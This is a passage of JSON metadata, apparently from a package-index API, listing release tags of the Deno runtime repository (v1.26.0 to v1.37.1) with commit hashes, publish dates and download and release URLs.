/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1